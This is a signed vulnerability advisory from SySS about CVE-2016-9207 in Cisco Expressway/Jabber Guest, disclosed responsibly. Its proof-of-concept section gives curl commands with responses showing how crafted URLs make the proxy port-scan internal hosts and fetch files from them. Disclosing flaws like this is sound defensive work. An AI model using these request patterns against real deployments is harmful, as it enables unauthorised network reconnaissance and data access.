-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Advisory ID: SYSS-2016-115 Product: Expressway Manufacturer: Cisco Affected Version(s): below X8.9 Tested Version(s): X8.8.1 Vulnerability Type: Improper Input Validation (CWE-20) Risk Level: Medium Solution Status: Fixed Manufacturer Notification: 2016-11-10 Solution Date: 2016-12-05 Public Disclosure: 2016-12-14 CVE Reference: CVE-2016-9207 Author of Advisory: Micha Borrmann, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: Jabber Guest [1] can be used to connect people from the Internet with enterprise workers using video calls within a web browser. Due to improper input validation, it is possible by using specially crafted URLs to perform port scans from the used video communication server (VCS) [2] of any system which can be reached by it, usually internal servers. It is also possible to perform denial-of-service attacks against the VCS by downloading large files. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: A part of the URL is a host name (usually the internal Jabber Guest server) which will be connected from the EXP-C [3] which acts like a web proxy, if /jabberc/rest/calls/ is appended to the first "directory". With a colon (:), it is also possible to specify a target TCP port. Therefore, anybody, for example an external attacker, can abuse the web-based application to connect to target systems. If the system is a web server, it also possible to download files from it. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): This HTTP GET requests connects to the SSH server on localhost: $ curl --include https://jabberguest.company.com/127.0.0.1:22/jabberc/rest/calls/index.txt HTTP/1.1 200 Connection Established Server: nginx/1.6.2 Date: Fri, 11 Nov 2016 12:14:20 GMT Transfer-Encoding: chunked Connection: keep-alive Age: 0 SSH-2.0-OpenSSH_6.6 PKIX Protocol mismatch. It can be confirmed, that no SMTP service is running on localhost (very simple port scan): $ curl --include https://jabberguest.company.com/127.0.0.1:25/jabberc/rest/calls/index.txt HTTP/1.1 502 Connection refused Server: nginx/1.6.2 Date: Fri, 11 Nov 2016 12:22:30 GMT Content-Type: text/html; charset=utf-8 Content-Length: 253 Connection: keep-alive Cache-Control: no-store Content-Language: en Age: 0 <HTML> <HEAD> <TITLE>Could Not Connect</TITLE> </HEAD> <BODY BGCOLOR="white" FGCOLOR="black"> <H1>Could Not Connect</H1> <HR> <FONT FACE="Helvetica,Arial"><B> Description: Could not connect to the server "<EM>127.0.0.1</EM>". </B></FONT> <HR> </BODY> Connections to other servers are possible, too: $ curl --include https://jabberguest.company.com/172.27.14.74:22/jabberc/rest/calls/index.txt HTTP/1.1 200 Connection Established Server: nginx/1.6.2 Date: Fri, 11 Nov 2016 12:13:00 GMT Transfer-Encoding: chunked Connection: keep-alive Age: 0 SSH-2.0-OpenSSH_6.2_hpn13v11 FreeBSD-20130515 Protocol mismatch. If a web server contains files within the directory structure /jabberc/rest/calls/, they can be downloaded via the Jabber Guest via EXP-E via EXP-C. For demonstration purposes, there was a simple text file placed at such directory (on a Microsoft Server system which can also be identified): $ curl --include https://jabberguest.company.com/172.27.14.12/jabberc/rest/calls/index.txt HTTP/1.1 200 OK Content-Type: text/plain Last-Modified: Thu, 27 Oct 2016 12:21:08 GMT Accept-Ranges: bytes ETag: "78c1c7984c30d21:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Thu, 10 Nov 2016 09:28:15 GMT Content-Length: 7 Age: 0 Connection: keep-alive hallo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Update to software version 8.9 More Information: https://software.cisco.com/download/release.html?mdfid=286255326&flowid=77866&softwareid=280886992&release=X8.9&relind=AVAILABLE&rellifecycle=&reltype=latest ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2016-10-27: Vulnerability discovered 2016-11-10: Vulnerability reported to manufacturer 2016-12-05: Patch released by manufacturer 2016-12-07: Public disclosure of vulnerability by manufacturer [4] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for Jabber Guest http://www.cisco.com/c/en/us/products/unified-communications/jabber-guest/index.html [2] Product website for Video Communication Server (VCS) http://www.cisco.com/c/en/us/products/unified-communications/telepresence-video-communication-server-vcs/index.html [3] Product website for Expressway http://www.cisco.com/c/en/us/products/unified-communications/expressway-series/index.html [4] Cisco Security Advisory: Cisco Expressway Series Software Security Bypass Vulnerability https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161207-expressway [5] SySS Security Advisory SYSS-2016-115 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-115.txt [6] SySS Responsible Disclosure Policy https://www.syss.de/en/news/responsible-disclosure-policy/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Micha Borrmann of SySS GmbH. E-Mail: micha.borrmann@xxxxxxx Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Micha_Borrmann.asc Key ID: 0xEDBE26E714EA58760 Key Fingerprint: F2E7 C6A5 9950 84ED 7AD6 0DD4 EDBE 26E7 14EA 5876 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCAAdFiEE8ufGpZlQhO161g3U7b4m5xTqWHYFAlhRQsIACgkQ7b4m5xTq WHbgng//Xk5ZUqAtc7U47JlqoOzAd/luGgRQF3UXPVCjyFncRi13HuQjd7vZccyw 8SlwCpACHeLSnB6vcCqkG2FVIbmnQWyWjF1ZFQsvLNbAZGHc+IfG9wGm1W10oL1r +GLvjA/edwG+L0ifga0Mpw051N1/22/mAz77ISyuJ89x5pjzGD583WKdlCF7E/Z9 yZpMILpTfLH1+pIsCHYNtnUhToQbUAquPrXxp4iQxM5mK16/0Aa+lNLHYKCA0zz0 idnBKbepYTpB562hoJERegMfVfMmrIZteyrOVPHILJOwOoCkLIZCSx9gBG7cnImz Pwe9XAzvA/oJZIrbOozi+0L4ANdhAWVcXpj6YCvRObJ56iXT4sK733iuIaGyB5Ur vTUGCI5+ASi8hKmJdX0n2mGj57UjOskahH3BACIgxM6X4AfPfAxCFstBBRdx0w8Z jd3/RqvH0hfVuwPowClaGjwvuEFGGTMFo8sd0JaYLiqnTustvHNMJlfmjXJ2paXy bDHQ1aIdxyAqsCNjTL+jyE+jhM5kHLGLFUmtR8DWpBoNfM73BwxAHmLb0ypTWLQv yqS9n1E24VJjkcv6r0i6qY0grU6RddUKXoC5gDlcvY/kQhnNHHqBHJC8veIRcMj4 U3E6NkU+Q6iCATkBqWxSPKkvmtdbYmo0M85djq3yxEUUthVFQWw= =LH5U -----END PGP SIGNATURE-----